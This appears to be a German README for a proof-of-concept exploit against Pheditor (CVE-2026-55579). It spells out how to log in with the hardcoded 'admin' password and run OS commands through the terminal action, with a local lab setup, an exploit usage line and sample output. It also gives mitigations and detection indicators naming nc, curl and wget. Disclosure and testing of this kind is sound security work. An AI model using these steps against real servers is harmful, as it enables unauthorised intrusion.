
CVE-2026-55579 – Nicht authentifizierte RCE in Pheditor über hartcodiertes Standardpasswort „admin". Vollständiger Python-Exploit mit Dateiupload & Terminal-Ausführung. Keine Abhängigkeiten.
TL;DR: Pheditor (alle Versionen) wird mit einem fest codierten Standard-Administrator-Passwort (
admin) ausgeliefert, das im Quellcode eingebettet ist. Es gibt keine erzwungene Passwortänderung bei der ersten Anmeldung, nur eine optische Warnung. Jeder nicht authentifizierte Angreifer kann sich als Admin anmelden und das integrierte Terminal-Panel (action=terminal) missbrauchen, um beliebige Betriebssystembefehle mit den Rechten des Webservers auszuführen. Zusammen mit den Datei-Upload-Funktionen führt dies zu nicht authentifizierter Remote-Code-Ausführung (RCE).
Die Schwachstelle resultiert aus einem fest codierten SHA‑512-Hash des Passworts admin in pheditor.php (Zeile 11):
define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');
Dieser Hash entspricht:
echo -n 'admin' | sha512sum
Warum dies ein Game Over ist:
pheditor.php).admin/admin kann sich ein Angreifer anmelden und vollen Zugriff erhalten auf:
action=terminal)action=upload)action=open/action=save)Es gibt keine Ratenbegrenzung, keine Sperrung und keinen zusätzlichen Authentifizierungsfaktor.
Der Angriff ist extrem einfach und erfordert kein Raten:
POST-Anfrage an pheditor.php mit pheditor_password=admin. Der Server setzt ein Session-Cookie.token.POST-Anfrage mit:
action=terminaltoken=<extracted>command=<OS command>dir= (optional)<pre>-Tags zurückgegeben und kann sauber geparst werden.Alternativ kann der Angreifer eine Web-Shell hochladen oder Anwendungsdateien überschreiben.
Klonen Sie das offizielle Repository und starten Sie einen lokalen Server:
git clone https://github.com/pheditor/pheditor.git /tmp/pheditor
cd /tmp/pheditor
php -S localhost:8080 pheditor.php &
Der bereitgestellte Python-Exploit verlässt sich nur auf die Python-Standardbibliothek (keine externen Abhängigkeiten). Er bietet eine auf argparse basierende CLI, erweiterte Fehlerbehandlung, ausführlichen Modus und Timeout-Kontrolle.
python3 exploit.py http://localhost:8080/pheditor.php "id; hostname; whoami"
[*] Logging in with password: admin
[+] Login successful
[*] Extracting CSRF token...
[+] Token: a1b2c3d4e5f6...
[*] Executing: id; hostname; whoami
==================================================
Command Output:
==================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
www-data
==================================================
Eine erfolgreiche Ausnutzung gewährt dem Angreifer:
root) läuft, erlangt der Angreifer die vollständige Kontrolle über den Host.Da Pheditor häufig in Entwicklungsumgebungen oder als leichtgewichtiger Dateimanager verwendet wird, können Angreifer es leicht finden und ausnutzen, um erste Zugangspunkte zu erhalten.
pheditor_password=admin).Überwachen Sie Ihre Umgebung auf Indikatoren einer Kompromittierung:
pheditor.php mit pheditor_password=admin oder action=terminal.sh, bash, nc, curl oder wget betreffen.Für eine detailliertere Betrachtung der Exploit-Kette und zusätzlicher Payloads siehe ANALYSIS.md.
Haftungsausschluss: Dieses Repository enthält einen Proof of Concept (PoC), der ausschließlich für defensive, pädagogische und autorisierte Sicherheitstestzwecke bestimmt ist. Verwenden Sie diesen Code nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben. Die Autoren übernehmen keine Haftung für Missbrauch.
| Attribut | Einzelheiten |
|---|
| CVE-Kennung | CVE-2026-55579 |
| Betroffene Software | Pheditor (alle Versionen bis einschließlich aktueller HEAD) |
| Behobene Version | Noch keine (Hersteller-Patch nicht veröffentlicht; Workaround erforderlich) |
| Schwachstellenklasse | CWE-798: Verwendung fest codierter Anmeldeinformationen |
| CVSS v3.1 Bewertung | 9.8 (Critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Authentifizierung | Keine – Standard-Anmeldeinformationen sind öffentlich bekannt |
| Verifizierung | Bestätigt an einer frischen Installation von Pheditor |